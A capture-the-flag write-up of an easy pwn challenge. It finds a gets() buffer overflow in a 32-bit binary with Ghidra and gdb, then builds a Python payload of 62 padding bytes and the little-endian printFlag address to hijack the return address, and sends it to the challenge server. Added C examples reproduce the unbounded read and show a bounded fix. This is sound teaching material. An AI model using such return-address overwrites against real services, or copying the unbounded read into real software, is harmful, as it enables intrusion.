
Never Called

PWN EASY - 362 points

Description

I made a C program and in the program the method to get the flag is never called. How will you get it this time?

ASLR is off on the server.

https://storage.ebucket.dev/a.out

We have a server to connect to that hosts the C program, and we also get the compiled program as an a.out binary (no source code).

[Screenshot: first test run of the program]

So the program asks for input, prints the input back, and then exits.

I'm going to check Ghidra to get more info.

[Screenshot: the printFlag function in Ghidra]

I have found a function that seems to be printing the flag. The flag file doesn't exist on the local copy of the program, but it does on the server at the provided IP address.

However, the function is never called by anything, so we cannot really get the flag. Or can we?

There is also a function called getMessage:

[Screenshot: the getMessage function in Ghidra]

This seems to be the function that runs when we start the program. Note the call to gets, which should be an instant buffer-overflow alarm, since gets reads a line with no length limit. At this point I'm assuming we are going to overflow the buffer that gets fills and redirect execution to the printFlag address.
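To make the defect concrete, here is an added example (not the challenge's own source, which only ships as a binary) of the shape getMessage has as described above, a 54-byte name buffer filled by a gets-style read, beside a bounded replacement. The 54-byte size is the one recovered from the binary; the function names, the greeting text, the unbounded_gets helper (written out because current toolchains no longer declare gets) and the two sample input lines are assumptions constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 54   /* buffer size the write-up recovered from the binary */

/* Same contract as the C library's gets(): read until newline or EOF with
 * no bound on dst. Spelled out here because current toolchains no longer
 * declare gets(); it exists only to show the defect and is never run. */
char *unbounded_gets(char *dst, FILE *in)
{
    char *p = dst;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *p++ = (char)c;               /* nothing stops p running past dst */
    if (c == EOF && p == dst)
        return NULL;
    *p = '\0';
    return dst;
}

/* Reconstructed shape of the challenge's getMessage (hypothetical). A line
 * longer than the buffer overwrites the stack slots that follow it. */
void get_message_unsafe(FILE *in, FILE *out)
{
    char name[NAME_LEN];
    fputs("Enter your name: ", out);
    if (unbounded_gets(name, in) != NULL)
        fprintf(out, "Hello, %s\n", name);
}

/* Hardened replacement: bounded read, newline stripped, and an overlong
 * line reported and drained so its tail cannot be picked up by the next
 * read. Returns 0 on success, 1 if the line was truncated, -1 on EOF/error. */
int read_name_safe(char *dst, size_t dstlen, FILE *in)
{
    if (dstlen == 0 || fgets(dst, (int)dstlen, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';            /* whole line fit, newline included */
        return 0;
    }
    if (n + 1 < dstlen)
        return 0;                     /* last line of input, no newline */
    int c = fgetc(in);                /* buffer is full: what came next? */
    if (c == EOF || c == '\n')
        return 0;                     /* line was exactly dstlen - 1 bytes */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                             /* discard the part that did not fit */
    return 1;
}

void get_message_safe(FILE *in, FILE *out)
{
    char name[NAME_LEN];
    fputs("Enter your name: ", out);
    if (read_name_safe(name, sizeof name, in) >= 0)
        fprintf(out, "Hello, %s\n", name);
}

/* Constructed inputs: the write-up's 65 b's and a name that fits. */
const char LINE_OVERLONG[] = "bbbbbbbbbb" "bbbbbbbbbb" "bbbbbbbbbb"
                             "bbbbbbbbbb" "bbbbbbbbbb" "bbbbbbbbbb" "bbbbb" "\n";
const char LINE_SHORT[] = "alice\n";

/* Feed one constructed line through read_name_safe with a NAME_LEN buffer. */
static int run_line(const char *line, char name[NAME_LEN])
{
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return -1;
    int rc = read_name_safe(name, NAME_LEN, in);
    fclose(in);
    return rc;
}

int demo_status(const char *line)      /* 1 for the 65-b line, 0 for "alice" */
{
    char name[NAME_LEN];
    return run_line(line, name);
}

size_t demo_length(const char *line)   /* 53 for the 65-b line, 5 for "alice" */
{
    char name[NAME_LEN];
    return run_line(line, name) < 0 ? 0 : strlen(name);
}
```

With the bounded reader the 65-byte line is cut at 53 characters and the excess is discarded, so nothing past the buffer is written; the same input against the gets-style reader is exactly what produces the segmentation fault shown later in the write-up.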

So now we need to find the address we want to redirect execution to. I am going to use gdb, started with ./a.out as the target:

$ gdb ./a.out            
GNU gdb (Debian 13.1-2) 13.1
...SNIP...
Reading symbols from ./a.out...
(gdb)

I am going to start by setting a breakpoint in the main function, then run the program and try to print the printFlag function location.

(gdb) p printFlag
$1 = {void ()} 0x565562ab <printFlag>

So the address is 0x565562ab. Let's quit gdb and try to overflow the program.

Alright, we could have noticed earlier that the variable filled by gets has a buffer of 54 bytes. So let's try to send the letter b 54 times:

python3 -c "print('b'*54)" | ./a.out                 
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
zsh: done                              python3 -c "print('b'*54)" | 
zsh: segmentation fault (core dumped)  ./a.out

Then let's look at the core file to see which address execution ended on:

$ gdb -q -c core -ex quit             
[New LWP 12745]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x56577202 in ?? ()

So, I don't see the letter b in the faulting address yet, but we get a segmentation fault, so we did overflow something. Let's send even more letters and see whether our input starts showing up in that address.

python3 -c "print('b'*65)" | ./a.out

Cool, we ended on the address 0x00626262, and since 0x62 is the letter b, we know that our input is overwriting the address the program returns to.

Now we need to put the address of printFlag into that spot. First we find the sweet spot: the number of b's that brings us right up to the point where the next bytes become the address. Since 'b'*65 put 62 into the address 3 times, we should hit the spot with 62 b's.

So now we can put the address bytes after our prepared b's. One way to do this in Python is to write each byte as a \x escape.

python -c "print('b'*62 +'\x56\x55\x62\xab')" | ./a.out

Now we overflowed all the way up to the address, but the hex appears flipped, because the address is stored in memory with its lowest byte first (little-endian). So let's reverse our byte sequence.

python -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out
┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit                                
[New LWP 12836]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x5562abc2 in ?? ()

Hmm, a c2 byte appears from somewhere. That's because Python 3 treats the string as text and print encodes it as UTF-8, so \xab becomes the two bytes c2 ab. Python 2 writes the bytes as they are, so we just use python2 instead.

┌──(kali㉿kali)-[~/Desktop/nevercalled]
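Both effects seen above, the reversed byte order and the stray c2, can be reproduced without touching the binary. The following added example (not part of the original write-up) serialises the printFlag address in little-endian order, reads four bytes back the way the CPU does when it pops a saved return address, and models what Python 3's default UTF-8 output does to bytes 0x80 and above; the address value is the one the write-up recovered in gdb, while the function names and the UTF-8 model are this example's own.

```c
#include <stddef.h>
#include <stdint.h>

#define PRINTFLAG_ADDR 0x565562abu   /* address recovered in gdb in the write-up */

/* Serialise a 32-bit value little-endian: low byte first, which is why
 * 0x565562ab has to be sent as ab 62 55 56. */
void put_le32(uint32_t v, uint8_t out[4])
{
    out[0] = (uint8_t)(v);
    out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16);
    out[3] = (uint8_t)(v >> 24);
}

/* Interpret four bytes the way an x86 CPU does when it pops a saved EIP. */
uint32_t get_le32(const uint8_t in[4])
{
    return (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
           ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);
}

/* Model of what Python 3's print() does to a str: each character is UTF-8
 * encoded, so code points 0x80..0xFF become two bytes (C2/C3 xx) instead of
 * one. Returns the number of output bytes, or 0 if out is too small. */
size_t utf8_encode_latin1(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        if (in[i] < 0x80) {
            if (o + 1 > cap) return 0;
            out[o++] = in[i];
        } else {
            if (o + 2 > cap) return 0;
            out[o++] = (uint8_t)(0xC0 | (in[i] >> 6));
            out[o++] = (uint8_t)(0x80 | (in[i] & 0x3F));
        }
    }
    return o;
}

/* Value in the return-address slot when the four address bytes are written
 * raw (what python2 did): the intended address, 0x565562ab. */
uint32_t eip_from_raw_bytes(void)
{
    uint8_t slot[4];
    put_le32(PRINTFLAG_ADDR, slot);
    return get_le32(slot);
}

/* Same bytes pushed through UTF-8 first: 0xAB becomes C2 AB, the slot now
 * reads C2 AB 62 55, i.e. 0x5562abc2, the value the core dump showed after
 * the python3 attempt. */
uint32_t eip_from_utf8_text(void)
{
    uint8_t addr[4], encoded[8];
    put_le32(PRINTFLAG_ADDR, addr);
    size_t n = utf8_encode_latin1(addr, 4, encoded, sizeof encoded);
    return n >= 4 ? get_le32(encoded) : 0;
}
```

The takeaway for anyone reading a core dump like the one above: a faulting address that contains the bytes you sent but shifted by one, with a c2 or c3 in front, is the signature of text-mode output encoding the data rather than a wrong offset.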
└─$ python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb�bUV
zsh: done                              python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | 
zsh: segmentation fault (core dumped)  ./a.out

┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit                                 
[New LWP 12852]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x565562ab in ?? ()

And just like that, execution lands on the address of printFlag! Now we just swap ./a.out for nc <ip.address> <port> and we get the bucket flag!
